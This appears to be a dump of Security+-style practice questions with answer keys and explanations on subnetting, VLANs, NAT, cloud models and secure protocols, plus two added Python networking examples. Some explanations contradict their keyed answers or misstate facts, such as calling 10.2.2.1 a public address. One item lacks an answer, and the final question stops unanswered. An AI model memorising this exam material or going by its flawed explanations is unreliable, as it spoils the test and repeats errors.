Explanation: With the given subnet mask, a maximum number of 30 hosts between IP addresses 10.4.4.161 and 10.4.4.190 are allowed. Therefore, options C and D would be hosts on the same subnet, and the other options would not.


References: http://www.subnetonline.com/pages/subnet-calculators/ip-subnet-calculator.php

Which of the following would the security engineer set as the subnet mask for the servers below to utilize host addresses on separate broadcast domains?


Server 1: 192.168.100.6


Server 2: 192.168.100.9


Server 3: 192.169.100.20




A. /24


B. /27


C. /28


D. /29


E. /30

Answer: D


Explanation: Using this option will result in all three servers using host addresses on different broadcast domains.

Which of the following is BEST used to break a group of IP addresses into smaller network segments or blocks?


A. NAT


B. Virtualization


C. NAC


D. Subnetting

Answer: D


Explanation: Subnetting is a dividing process used on networks to divide larger groups of hosts into smaller collections.

A small company can only afford to buy an all-in-one wireless router/switch. The company has 3 wireless BYOD users and 2 web servers without wireless access. Which of the following should the company configure to protect the servers from the user devices? (Select TWO).




A. Deny incoming connections to the outside router interface.


B. Change the default HTTP port


C. Implement EAP-TLS to establish mutual authentication


D. Disable the physical switch ports


E. Create a server VLAN


F. Create an ACL to access the server

Answer: E,F


Explanation: We can protect the servers from the user devices by separating them into separate VLANs (virtual local area networks). The network device in the question is a router/switch. We can use the router to allow access from devices in one VLAN to the servers in the other VLAN. We can configure an ACL (Access Control List) on the router to determine who is able to access the server. In computer networking, a single layer-2 network may be partitioned to create multiple distinct broadcast domains, which are mutually isolated so that packets can only pass between them via one or more routers; such a domain is referred to as a virtual local area network, virtual LAN or VLAN. This is usually achieved on switch or router devices. Simpler devices only support partitioning on a port level (if at all), so sharing VLANs across devices requires running dedicated cabling for each VLAN. More sophisticated devices can mark packets through tagging, so that a single interconnect (trunk) may be used to transport data for multiple VLANs. Grouping hosts with a common set of requirements regardless of their physical location by VLAN can greatly simplify network design. A VLAN has the same attributes as a physical local area network (LAN), but it allows for end stations to be grouped together more easily even if they are not on the same network switch. The network described in this question is a DMZ, not a VLAN.

A network engineer is setting up a network for a company. There is a BYOD policy for the employees so that they can connect their laptops and mobile devices. Which of the following technologies should be employed to separate the administrative network from the network in which all of the employees’ devices are connected?




A. VPN


B. VLAN


C. WPA2


D. MAC filtering

Answer: B


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function.

Pete, a network administrator, is capturing packets on the network and notices that a large amount of the traffic on the LAN is SIP and RTP protocols. Which of the following should he do to segment that traffic from the other traffic?




A. Connect the WAP to a different switch.


B. Create a voice VLAN.


C. Create a DMZ.


D. Set the switch ports to 802.1q mode.

Answer: B


Explanation: It is a common and recommended practice to separate voice and data traffic by using VLANs. Separating voice and data traffic using VLANs provides a solid security boundary, preventing data applications from reaching the voice traffic. It also gives you a simpler method to deploy QoS, prioritizing the voice traffic over the data.

An administrator connects VoIP phones to the same switch as the network PCs and printers. Which of the following would provide the BEST logical separation of these three device types while still allowing traffic between them via ACL?




A. Create three VLANs on the switch connected to a router


B. Define three subnets, configure each device to use their own dedicated IP address range, and then connect the network to a router


C. Install a firewall and connect it to the switch


D. Install a firewall and connect it to a dedicated switch for each device type

Answer: A


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function.

An administrator needs to segment internal traffic between layer 2 devices within the LAN. Which of the following types of network design elements would MOST likely be used?


A. Routing


B. DMZ


C. VLAN


D. NAT

Answer: C


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function.

Pete, a security administrator, is informed that people from the HR department should not have access to the accounting department’s server, and the accounting department should not have access to the HR department’s server. The network is separated by switches. Which of the following is designed to keep the HR department users from accessing the accounting department’s server and vice-versa?




A. ACLs


B. VLANs


C. DMZs


D. NATS

Answer: B


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. VLANs are used for traffic management. Communications between ports within the same VLAN occur without hindrance, but communications between VLANs require a routing function.

According to company policy an administrator must logically keep the Human Resources department separated from the Accounting department. Which of the following would be the simplest way to accomplish this?


A. NIDS


B. DMZ


C. NAT


D. VLAN

Answer: D


Explanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches.

Review the following diagram depicting communication between PC1 and PC2 on each side of a router. Analyze the network traffic logs which show communication between the two computers as captured by the computer with IP 10.2.2.10.

DIAGRAM

PC1                                                                    PC2

[192.168.1.30]--------[INSIDE 192.168.1.1 router OUTSIDE 10.2.2.1]---------[10.2.2.10]

LOGS

10:30:22, SRC 10.2.2.1:3030, DST 10.2.2.10:80, SYN

10:30:23, SRC 10.2.2.10:80, DST 10.2.2.1:3030, SYN/ACK

10:30:24, SRC 10.2.2.1:3030, DST 10.2.2.10:80, ACK




Given the above information, which of the following can be inferred about the above environment?




A. 192.168.1.30 is a web server.


B. The web server listens on a non-standard port.


C. The router filters port 80 traffic.


D. The router implements NAT.

Answer: D


Explanation: Network address translation (NAT) allows you to share a connection to the public Internet via a single interface with a single public IP address. NAT maps the private addresses to the public address. In a typical configuration, a local network uses one of the designated "private" IP address subnets. A router on that network has a private address (192.168.1.1) in that address space, and is also connected to the Internet with a "public" address (10.2.2.1) assigned by an Internet service provider.

An administrator wishes to hide the network addresses of an internal network when connecting to the Internet. The MOST effective way to mask the network address of the users would be by passing the traffic through a:




A. stateful firewall


B. packet-filtering firewall


C. NIPS


D. NAT

Answer: D


Explanation: NAT serves as a basic firewall by only allowing incoming traffic that is in response to an internal system’s request.

A security analyst is reviewing firewall logs while investigating a compromised web server. The following ports appear in the log: 22, 25, 445, 1433, 3128, 3389, 6667. Which of the following protocols was used to access the server remotely?




A. LDAP


B. HTTP


C. RDP


D. HTTPS

Answer: C


Explanation: RDP uses TCP port 3389.

Which of the following is a programming interface that allows a remote computer to run programs on a local machine?




A. RPC


B. RSH


C. SSH


D. SSL

Answer: A


Explanation: Remote Procedure Call (RPC) is a programming interface that allows a remote computer to run programs on a local machine.

Which of the following would Pete, a security administrator, MOST likely implement in order to allow employees to have secure remote access to certain internal network services such as file servers?




A. Packet filtering firewall


B. VPN gateway


C. Switch


D. Router

Answer: B


Explanation: VPNs are usually employed to allow remote access users to connect to and access the network, and offer connectivity between two or more private networks or LANs. A VPN gateway (VPN router) is a connection point that connects two LANs via a nonsecure network such as the Internet.

Which of the following should be performed to increase the availability of IP telephony by prioritizing traffic?




A. Subnetting


B. NAT


C. Quality of service


D. NAC

Answer: C


Explanation: Quality of Service (QoS) facilitates the deployment of media-rich applications, such as video conferencing and Internet Protocol (IP) telephony, without adversely affecting network throughput.

An auditor is given access to a conference room to conduct an analysis. When they connect their laptop’s Ethernet cable into the wall jack, they are not able to get a connection to the Internet but have a link light. Which of the following is MOST likely causing this issue?




A. Ethernet cable is damaged


B. The host firewall is set to disallow outbound connections


C. Network Access Control


D. The switch port is administratively shutdown

Answer: C


Explanation: Network Access Control (NAC) means controlling access to an environment through strict adherence to and implementation of security policies. The goals of NAC are to prevent/reduce zero-day attacks, enforce security policy throughout the network, and use identities to perform access control.

A computer is put into a restricted VLAN until the computer’s virus definitions are up-to-date. Which of the following BEST describes this system type?




A. NAT


B. NIPS


C. NAC


D. DMZ

Answer: C


Explanation: Network Access Control (NAC) means controlling access to an environment through strict adherence to and implementation of security policies. The goals of NAC are to prevent/reduce zero-day attacks, enforce security policy throughout the network, and use identities to perform access control.

Which of the following is required to allow multiple servers to exist on one physical server?




A. Software as a Service (SaaS)


B. Platform as a Service (PaaS)


C. Virtualization


D. Infrastructure as a Service (IaaS)

Answer: C


Explanation: Virtualization allows a single set of hardware to host multiple virtual machines.

A corporation is looking to expand their data center but has run out of physical space in which to store hardware. Which of the following would offer the ability to expand while keeping their current data center operated by internal staff?




A. Virtualization


B. Subnetting


C. IaaS


D. SaaS

Answer: A


Explanation: Virtualization allows a single set of hardware to host multiple virtual machines.

The server administrator has noted that most servers have a lot of free disk space and low memory utilization. Which of the following statements will be correct if the server administrator migrates to a virtual server environment?




A. The administrator will need to deploy load balancing and clustering.




B. The administrator may spend more on licensing but less on hardware and equipment.




C. The administrator will not be able to add a test virtual environment in the data center.




D. Servers will encounter latency and lowered throughput issues.

update question, answer missing



Due to limited resources, a company must reduce their hardware budget while still maintaining availability. Which of the following would MOST likely help them achieve their objectives?




A. Virtualization


B. Remote access


C. Network access control


D. Blade servers

Answer: A


Explanation: Because virtualization allows a single set of hardware to host multiple virtual machines, it requires less hardware to maintain the current scenario.

Pete, a security engineer, is trying to inventory all servers in a rack. The engineer launches RDP sessions to five different PCs and notices that the hardware properties are similar. Additionally, the MAC addresses of all five servers appear on the same switch port. Which of the following is MOST likely the cause?




A. The system is running 802.1x.


B. The system is using NAC.


C. The system is in active-standby mode.


D. The system is virtualized.

Answer: D


Explanation: Virtualization allows a single set of hardware to host multiple virtual machines.

Which of the following offers the LEAST amount of protection against data theft by USB drives?




A. DLP


B. Database encryption


C. TPM


D. Cloud computing

Answer: D


Explanation: Cloud computing refers to performing data processing and storage elsewhere, over a network connection, rather than locally. Because users have access to the data, it can easily be copied to a USB device.

A company’s business model was changed to provide more web presence and now its ERM software is no longer able to support the security needs of the company. The current data center will continue to provide network and security services. Which of the following network elements would be used to support the new business model?




A. Software as a Service


B. DMZ


C. Remote access support


D. Infrastructure as a Service

Answer: A


Explanation: Software as a Service (SaaS) allows for on-demand online access to specific software applications or suites without having to install it locally. This will allow the data center to continue providing network and security services.

The Chief Information Officer (CIO) has mandated web based Customer Relationship Management (CRM) business functions be moved offshore to reduce cost, reduce IT overheads, and improve availability. The Chief Risk Officer (CRO) has agreed with the CIO’s direction but has mandated that key authentication systems be run within the organization’s network. Which of the following would BEST meet the CIO and CRO’s requirements?




A. Software as a Service


B. Infrastructure as a Service


C. Platform as a Service


D. Hosted virtualization service

Answer: A


Explanation: Software as a Service (SaaS) is a software distribution model in which applications are hosted by a vendor or service provider and made available to customers over a network, typically the Internet.

An IT director is looking to reduce the footprint of their company’s server environment. They have decided to move several internally developed software applications to an alternate environment, supported by an external company. Which of the following BEST describes this arrangement?




A. Infrastructure as a Service


B. Storage as a Service


C. Platform as a Service


D. Software as a Service

Answer: A


Explanation: Cloud users install operating-system images and their application software on the cloud infrastructure to deploy their applications. In this model, the cloud user patches and maintains the operating systems and the application software.

Which of the following offerings typically allows the customer to apply operating system patches?




A. Software as a service


B. Public Clouds


C. Cloud Based Storage


D. Infrastructure as a service

Answer: D


Explanation: Cloud users install operating-system images and their application software on the cloud infrastructure to deploy their applications. In this model, the cloud user patches and maintains the operating systems and the application software.

Which of the following technologies can store multi-tenant data with different security requirements?




A. Data loss prevention


B. Trusted platform module


C. Hard drive encryption


D. Cloud computing

Answer: D


Explanation: One of the ways cloud computing is able to obtain cost efficiencies is by putting data from various clients on the same machines. This “multitenant” nature means that workloads from different clients can be on the same system, and a flaw in implementation could compromise security.

Multi-tenancy is a concept found in which of the following?




A. Full disk encryption


B. Removable media


C. Cloud computing


D. Data loss prevention

Answer: C


Explanation: One of the ways cloud computing is able to obtain cost efficiencies is by putting data from various clients on the same machines. This “multitenant” nature means that workloads from different clients can be on the same system, and a flaw in implementation could compromise security.

Which of the following devices is BEST suited to protect an HTTP-based application that issusceptible to injection attacks?A. Protocol filterB. Load balancerC. NIDSD. Layer 7 firewall

Answer: DExplanation: An application-level gateway firewall filters traffic based on user access, group membership, theapplication or service used, or even the type of resources being transmitted. This type of firewall operates at the Application layer (Layer 7) of the OSI model.

Concurrent use of a firewall, content filtering, antivirus software and an IDS system would be considered components of:A. Redundant systems.B. Separation of duties.C. Layered security.D. Application control.

Answer: CExplanation: Layered security is the practice of combining multiple mitigating security controls to protectresources and data

A network engineer is designing a secure tunneled VPN. Which of the following protocols wouldbe the MOST secure?A. IPsecB. SFTPC. BGPD. PPTP

Answer: AExplanation: IPsec is the protocol suite that actually secures the tunnel: AH provides integrity and origin authentication, ESP adds confidentiality, and IKE negotiates the security associations and keys. PPTP relies on MPPE (RC4) for encryption and MS-CHAPv2 for authentication, both of which have well-known weaknesses, so it is no longer considered secure. L2TP on its own provides no encryption at all; that is why it is normally paired with IPsec as L2TP/IPsec. SFTP is a file-transfer protocol running over SSH and BGP is a routing protocol, so neither is a VPN tunneling protocol.

Configuring the mode, encryption methods, and security associations are part of which of thefollowing?A. IPSecB. Full disk encryptionC. 802.1xD. PKI

Answer: AExplanation: IPSec can operate in tunnel mode or transport mode. It uses symmetric cryptography to provideencryption security. Furthermore, it makes use of Internet Security Association and KeyManagement Protocol (ISAKMP).

A company’s legacy server requires administration using Telnet. Which of the following protocolscould be used to secure communication by offering encryption at a lower OSI layer? (SelectTWO).A. IPv6B. SFTPC. IPSecD. SSHE. IPv4

Answer: A,CExplanation: Telnet itself has no encryption, so the protection has to come from a lower layer. IPsec is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session. IPsec operates at Layer 3 of the OSI model, whereas Telnet operates at Layer 7, so the legacy Telnet session is protected without touching the application. IPsec was a mandatory part of the original IPv6 specification (later relaxed to recommended), which is why IPv6 is paired with it here; Telnet supports IPv6 connections. SSH and SFTP also encrypt, but they are Layer 7 replacements for Telnet rather than a lower-layer wrapper around it.

A network administrator needs to provide daily network usage reports on all layer 3 deviceswithout compromising any data while gathering the information. Which of the following would beconfigured to provide these reports?A. SNMPB. SNMPv3C. ICMPD. SSH

Answer: BExplanation: Currently, SNMP is predominantly used for monitoring and performance management. SNMPv3defines a secure version of SNMP and also facilitates remote configuration of the SNMP entities.

Matt, a security administrator, wants to configure all the switches and routers in the network inorder to securely monitor their status. Which of the following protocols would he need to configureon each device?A. SMTPB. SNMPv3C. IPSecD. SNMP

Answer: BExplanation: Currently, SNMP is predominantly used for monitoring and performancemanagement. SNMPv3 defines a secure version of SNMP and also facilitates remoteconfiguration of the SNMP entities.

A recent vulnerability scan found that Telnet is enabled on all network devices. Which of the following protocols should be used instead of Telnet?A. SCPB. SSHC. SFTPD. SSL

Answer: BExplanation: SSH transmits both authentication traffic and data in a secured encrypted form, whereas Telnettransmits both authentication credentials and data in clear text.

Which of the following is BEST used as a secure replacement for TELNET?A. HTTPSB. HMACC. GPGD. SSH

Answer: DExplanation: SSH transmits both authentication traffic and data in a secured encrypted form, whereas Telnettransmits both authentication credentials and data in clear text.

A security analyst needs to logon to the console to perform maintenance on a remote server.Which of the following protocols would provide secure access?A. SCPB. SSHC. SFTPD. HTTPS

Answer: BExplanation: Secure Shell (SSH) is a tunneling protocol originally used on Unix systems. It’s now available forboth Unix and Windows environments. SSH is primarily intended for interactive terminal sessions.SSH is used to establish a command-line, text-only interface connection with a server, router,switch, or similar device over any distance.

A UNIX administrator would like to use native commands to provide a secure way of connecting toother devices remotely and to securely transfer files. Which of the following protocols could beutilized? (Select TWO).A. RDPB. SNMPC. FTPD. SCPE. SSH

Answer: D,EExplanation: SSH is used to establish a command-line, text-only interface connection with a server, router,switch, or similar device over any distance.Secure Copy Protocol (SCP) is a secure file-transfer facility based on SSH and Remote CopyProtocol (RCP). SCP is commonly used on Linux and Unix platforms.

A network technician is on the phone with the system administration team. Power to the serverroom was lost and servers need to be restarted. The DNS services must be the first to berestarted. Several machines are powered off. Assuming each server only provides one service,which of the following should be powered on FIRST to establish DNS services?A. Bind serverB. Apache serverC. Exchange serverD. RADIUS server

Answer: AExplanation: BIND (Berkeley Internet Name Domain) is the most widely used Domain Name System (DNS) software on the Internet. Its server component is named (short for "name daemon"). This is the only option that directly involves DNS; Apache is a web server, Exchange a mail server and RADIUS an authentication server.

When reviewing security logs, an administrator sees requests for the AAAA record ofwww.comptia.com. Which of the following BEST describes this type of record?A. DNSSEC recordB. IPv4 DNS recordC. IPSEC DNS recordD. IPv6 DNS record

Answer: DExplanation: The AAAA Address record links a FQDN to an IPv6 address.

Which of the following should be implemented to stop an attacker from mapping out addressesand/or devices on a network?A. Single sign onB. IPv6C. Secure zone transfersD. VoIP

Answer: CExplanation: A primary DNS server holds the master copy of a zone, and secondary DNS servers keep copies of the zone for redundancy. When zone data changes on the primary, the changes are distributed to the secondaries through zone transfers (AXFR/IXFR, carried over TCP port 53). If zone transfers are allowed to any host, every resource record in the zone is readable by anyone who can reach your DNS server, which hands an attacker a complete map of your hostnames and addresses. Restrict transfers to the addresses of your secondaries (and authenticate them with TSIG) to stop an attacker from mapping out your addresses and devices.

A security engineer, Joe, has been asked to create a secure connection between his mail server and the mail server of a business partner. Which of the following protocol would be MOST appropriate?A. HTTPSB. SSHC. FTPD. TLS

Answer: DExplanation: Transport Layer Security (TLS) is a cryptographic protocol designed to providecommunications security over a computer network. It uses X.509 certificates and henceasymmetric cryptography to authenticate the counterparty with whom it is communicating, and toexchange a symmetric key. The TLS protocol allows client-server applications to communicateacross a network in a way designed to prevent eavesdropping and tampering.

Which of the following protocols is used to authenticate the client and server’s digital certificate?A. PEAPB. DNSC. TLSD. ICMP

Answer: CExplanation: Transport Layer Security (TLS) is a cryptographic protocol designed to provide communicationssecurity over a computer network. It uses X.509 certificates and hence asymmetric cryptographyto authenticate the counterparty with whom it is communicating, and to exchange a symmetric key.

An administrator configures all wireless access points to make use of a new network certificateauthority. Which of the following is being used?A. WEPB. LEAPC. EAP-TLSD. TKIP

Answer: CExplanation: The majority of the EAP-TLS implementations require client-side X.509 certificates without givingthe option to disable the requirement.

An achievement in providing worldwide Internet security was the signing of certificates associatedwith which of the following protocols?A. TCP/IPB. SSLC. SCPD. SSH

Answer: BExplanation: SSL (Secure Sockets Layer) is used for establishing an encrypted link between two computers,typically a web server and a browser. SSL is used to enable sensitive information such as logincredentials and credit card numbers to be transmitted securely.

Which of the following is the MOST secure protocol to transfer files?A. FTPB. FTPSC. SSHD. TELNET

Answer: BExplanation: FTPS refers to FTP Secure, or FTP SSL. It is a secure variation of File Transfer Protocol (FTP).

FTP/S uses which of the following TCP ports by default?A. 20 and 21B. 139 and 445C. 443 and 22D. 989 and 990

Answer: DExplanation: Implicit FTPS uses TCP port 990 for the control channel and TCP port 989 for data, with TLS negotiated before any FTP commands are sent. Explicit FTPS (the AUTH TLS command) instead starts on the standard FTP port 21 and upgrades to TLS, so which ports a firewall must open depends on which mode the server is configured for.

Which of the following protocols allows for secure transfer of files? (Select TWO).A. ICMPB. SNMPC. SFTPD. SCPE. TFTP

Answer: C,DExplanation: Standard FTP is a protocol often used to move files between one system and another either overthe Internet or within private networks. SFTP is a secured alternative to standard FTP.Secure Copy Protocol (SCP) is a secure file-transfer facility based on SSH and Remote CopyProtocol (RCP).

After a network outage, a PC technician is unable to ping various network devices. The networkadministrator verifies that those devices are working properly and can be accessed securely.Which of the following is the MOST likely reason the PC technician is unable to ping thosedevices?A. ICMP is being blockedB. SSH is not enabledC. DNS settings are wrongD. SNMP is not configured properly

Answer: AExplanation: ICMP is the protocol used by tools such as ping, traceroute, and pathping. If ICMP echo requests are dropped, or the echo replies are lost or blocked, ping reports no answer even though the device is up. Since the devices are confirmed working and reachable by other means, a rule blocking ICMP somewhere on the path is the most likely cause.

A security administrator wishes to change their wireless network so that IPSec is built into theprotocol and NAT is no longer required for address range extension. Which of the followingprotocols should be used in this scenario?A. WPA2B. WPAC. IPv6D. IPv4

Answer: CExplanation: IPsec is part of the IPv6 protocol suite itself (mandatory to implement in the original IPv6 specification, recommended in the current one) rather than an add-on as it is for IPv4, and IPv6's 128-bit address space removes the need for NAT to stretch an address range. Note that "built in" does not mean "on by default": IPsec policies and keys still have to be configured before any traffic is protected.

A system administrator attempts to ping a hostname and the response is 2001:4860:0:2001::68.Which of the following replies has the administrator received?A. The loopback addressB. The local MAC addressC. IPv4 addressD. IPv6 address

Answer: DExplanation: IPv6 addresses are 128-bits in length. An IPv6 address is represented as eight groups of fourhexadecimal digits, each group representing 16 bits (two octets). The groups are separated bycolons (:). The hexadecimal digits are case-insensitive, but IETF recommendations suggest theuse of lower case letters. The full representation of eight 4-digit groups may be simplified byseveral techniques, eliminating parts of the representation.
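Added example, not part of the original card set: a short Python script that classifies an address the way this question asks (IPv4, IPv6, loopback), expands a compressed IPv6 address to its eight groups, and shows one edge case the cards do not mention, the IPv4-mapped IPv6 form ::ffff:a.b.c.d that dual-stack sockets report for IPv4 clients. Address-based filters written for dotted-quad strings do not match that form unless it is unwrapped first. The sample addresses are constructed; only the standard library ipaddress module is used.

```python
import ipaddress

# Constructed sample inputs (not from the original page): the reply in the
# question, the IPv6 loopback, the IPv4 loopback and an IPv4-mapped IPv6 form.
SAMPLES = ["2001:4860:0:2001::68", "::1", "127.0.0.1", "::ffff:10.0.0.5"]


def normalize(addr_text):
    """Parse either address family and unwrap an IPv4-mapped IPv6 address
    (::ffff:a.b.c.d) to the IPv4 address it carries, so that address-based
    rules see the same host whichever form a dual-stack socket reported."""
    addr = ipaddress.ip_address(addr_text.strip())
    if addr.version == 6 and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def describe(addr_text):
    """Classify a reply the way the question asks: which family it is,
    whether it is loopback, and (for IPv6) the full eight-group form."""
    raw = ipaddress.ip_address(addr_text.strip())
    info = {
        "version": raw.version,
        "loopback": raw.is_loopback,
        "link_local": raw.is_link_local,
        "private": raw.is_private,
        "mapped_ipv4": str(raw.ipv4_mapped) if raw.version == 6 and raw.ipv4_mapped else None,
    }
    if raw.version == 6:
        info["exploded"] = raw.exploded      # every group written out with leading zeros
        info["compressed"] = raw.compressed  # longest run of zero groups collapsed to ::
    return info


def allowed_naive(addr_text, allow_nets):
    """Literal comparison: an IPv6 address never matches an IPv4 network, so
    ::ffff:10.0.0.5 is refused by an allow-list written for 10.0.0.0/8 (and,
    just as badly, slips past a block-list written the same way)."""
    addr = ipaddress.ip_address(addr_text.strip())
    return any(addr in ipaddress.ip_network(net) for net in allow_nets)


def allowed(addr_text, allow_nets):
    """The same check after normalize(): mapped addresses are compared as IPv4."""
    addr = normalize(addr_text)
    return any(addr in ipaddress.ip_network(net) for net in allow_nets)


if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, describe(sample))
    print("naive:", allowed_naive("::ffff:10.0.0.5", ["10.0.0.0/8"]),
          "normalized:", allowed("::ffff:10.0.0.5", ["10.0.0.0/8"]))
```

The same normalization matters in log analysis: a web server behind a dual-stack listener may record the attacker as ::ffff:203.0.113.9, which a naive string match against a blocklist of IPv4 ranges will never hit.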

Which of the following protocols is used by IPv6 for MAC address resolution?A. NDPB. ARPC. DNSD. NCP

Answer: AExplanation: The Neighbor Discovery Protocol (NDP) is a protocol in the Internet protocol suite used withInternet Protocol Version 6 (IPv6).

Which of the following protocols allows for the LARGEST address space?A. IPXB. IPv4C. IPv6D. Appletalk

Answer: CExplanation: The main advantage of IPv6 over IPv4 is its larger address space. The length of an IPv6 addressis 128 bits, compared with 32 bits in IPv4.

Pete, a network administrator, is implementing IPv6 in the DMZ. Which of the following protocolsmust he allow through the firewall to ensure the web servers can be reached via IPv6 from an IPv6enabled Internet host?A. TCP port 443 and IP protocol 46B. TCP port 80 and TCP port 443C. TCP port 80 and ICMPD. TCP port 443 and SNMP

Answer: BExplanation: HTTP and HTTPS, which use TCP port 80 and TCP port 443 respectively, are necessary for communicating with web servers and must therefore be allowed through the firewall; the transport ports are the same for IPv6 as for IPv4. In practice an IPv6 firewall must also permit ICMPv6, because Neighbor Discovery and Path MTU Discovery depend on it and blocking it wholesale breaks IPv6 connectivity (RFC 4890 gives filtering guidance), but that is not among the options here.

Which of the following ports and protocol types must be opened on a host with a host-basedfirewall to allow incoming SFTP connections?A. 21/UDPB. 21/TCPC. 22/UDPD. 22/TCP

Answer: DExplanation: SSH uses TCP port 22, and every service tunneled over SSH, including SFTP, SCP and slogin, shares that single TCP port. SFTP is not FTP over TLS (that is FTPS, on port 21 or 990) and uses neither port 21 nor UDP.

A network administrator is asked to send a large file containing PII to a business associate.Which of the following protocols is the BEST choice to use?A. SSHB. SFTPC. SMTPD. FTP

Answer: BExplanation: SFTP encrypts authentication and data traffic between the client and server by making use of SSHto provide secure FTP communications. As a result, SFTP offers protection for both theauthentication traffic and the data transfer taking place between a client and server.

Which of the following is a difference between TFTP and FTP?A. TFTP is slower than FTP.B. TFTP is more secure than FTP.C. TFTP utilizes TCP and FTP uses UDP.D. TFTP utilizes UDP and FTP uses TCP

Answer: DExplanation: FTP employs TCP ports 20 and 21 to establish and maintain client-to-server communications,whereas TFTP makes use of UDP port 69

Which of the following is the default port for TFTP?A. 20B. 69C. 21D. 68

Answer: BExplanation: TFTP makes use of UDP port 69.

A network consists of various remote sites that connect back to two main locations. Pete, thesecurity administrator, needs to block TELNET access into the network. Which of the following, bydefault, would be the BEST choice to accomplish this goal?A. Block port 23 on the L2 switch at each remote siteB. Block port 23 on the network firewallC. Block port 25 on the L2 switch at each remote siteD. Block port 25 on the network firewall

Answer: BExplanation: Telnet is a terminal-emulation network application that supports remote connectivity for executing commands and running applications but doesn't support transfer of files. Telnet uses TCP port 23. Because it's a clear text protocol and service, it should be avoided and replaced with SSH. Blocking port 23 once at the network firewall covers every remote site; port 25 is SMTP.

A security analyst noticed a colleague typing the following command:`Telnet some-host 443’Which of the following was the colleague performing?A. A hacking attempt to the some-host web server with the purpose of achieving a distributeddenial of service attack.B. A quick test to see if there is a service running on some-host TCP/443, which is being routedcorrectly and not blocked by a firewall.C. Trying to establish an insecure remote management session. The colleague should be usingSSH or terminal services instead.D. A mistaken port being entered because telnet servers typically do not listen on port 443.

Answer: BExplanation: The syntax is telnet host port, where host is the name or IP address of the remote server and port is the TCP port to connect to. TCP port 443 is the default HTTPS port. By running telnet some-host 443 the colleague is only checking that a TCP connection to that port completes, which shows the path is routed correctly and the port is not blocked by a firewall; no Telnet login is attempted and nothing is sent over the connection.
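Added example, not from the original card set: the same probe written in Python, so that the three outcomes a practitioner reads off a telnet-to-port test are explicit. A completed handshake means something is listening; an immediate refusal (RST) means the host is reachable but nothing listens on that port; a timeout usually means a firewall is silently dropping the SYN. The listener used to exercise the probe is created in-process on 127.0.0.1, so the script runs offline; the "filtered" case cannot be produced locally and is only described.

```python
import socket


def tcp_check(host, port, timeout=2.0):
    """Do what `telnet host port` does when used as a probe: open a TCP
    connection and report what the three-way handshake told us.
      open        - SYN/ACK came back: a listener exists and the path is clear
      closed      - RST came back: host reachable, nothing listening on the port
      filtered    - no answer before the timeout: a firewall is most likely dropping the SYN
      unreachable - the local stack could not even route to the host
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    except OSError:
        return "unreachable"
    finally:
        s.close()


def with_listener(fn, host="127.0.0.1"):
    """Run fn(port) while a throwaway TCP listener is bound on host. The
    listener is constructed here only so the probe can be exercised offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))   # port 0: let the kernel pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    try:
        return fn(port)
    finally:
        srv.close()


def unbound_port(host="127.0.0.1"):
    """Find a port with nothing listening: bind to port 0, read the number back, release it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    print("with listener:", with_listener(lambda p: tcp_check("127.0.0.1", p)))
    print("no listener:  ", tcp_check("127.0.0.1", unbound_port()))
```

The distinction between "closed" and "filtered" is the one that matters when troubleshooting: a refusal proves routing works and points at the service, while a timeout points at a firewall or a black-holed route.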

A malicious program modified entries in the LMHOSTS file of an infected system. Which of thefollowing protocols would have been affected by this?A. ICMPB. BGPC. NetBIOSD. DNS

Answer: CExplanation: The LMHOSTS file provides a NetBIOS name resolution method that can be used for smallnetworks that do not use a WINS server. NetBIOS has been adapted to run on top of TCP/IP, andis still extensively used for name resolution and registration in Windows-based environments.

An information bank has been established to store contacts, phone numbers and other records. AUNIX application needs to connect to the index server using port 389. Which of the followingauthentication services should be used on this port by default?A. RADIUSB. KerberosC. TACACS+D. LDAP

Answer: DExplanation: LDAP makes use of port 389.

A firewall technician has been instructed to disable all non-secure ports on a corporate firewall.The technician has blocked traffic on port 21, 69, 80, and 137-139. The technician has allowedtraffic on ports 22 and 443. Which of the following correctly lists the protocols blocked andallowed?A. Blocked: TFTP, HTTP, NetBIOS; Allowed: HTTPS, FTPB. Blocked: FTP, TFTP, HTTP, NetBIOS; Allowed: SFTP, SSH, SCP, HTTPSC. Blocked: SFTP, TFTP, HTTP, NetBIOS; Allowed: SSH, SCP, HTTPSD. Blocked: FTP, HTTP, HTTPS; Allowed: SFTP, SSH, SCP, NetBIOS

Answer: BExplanation: The question states that traffic on ports 21, 69, 80, and 137-139 is blocked, while ports 22 and 443 are allowed.
Port 21 is used for FTP by default. Port 69 is used for TFTP. Port 80 is used for HTTP. Ports 137-139 are used for NetBIOS. Port 22 is used for SSH by default, and SFTP and SCP run over SSH on the same TCP port 22. Port 443 is used for HTTPS. Option B is the only one that lists exactly those protocols on each side.

A company has implemented PPTP as a VPN solution. Which of the following ports would need to be opened on the firewall in order for this VPN to function properly? (Select TWO).A. UDP 1723 B. TCP 500 C. TCP 1723 D. UDP 47 E. TCP 47

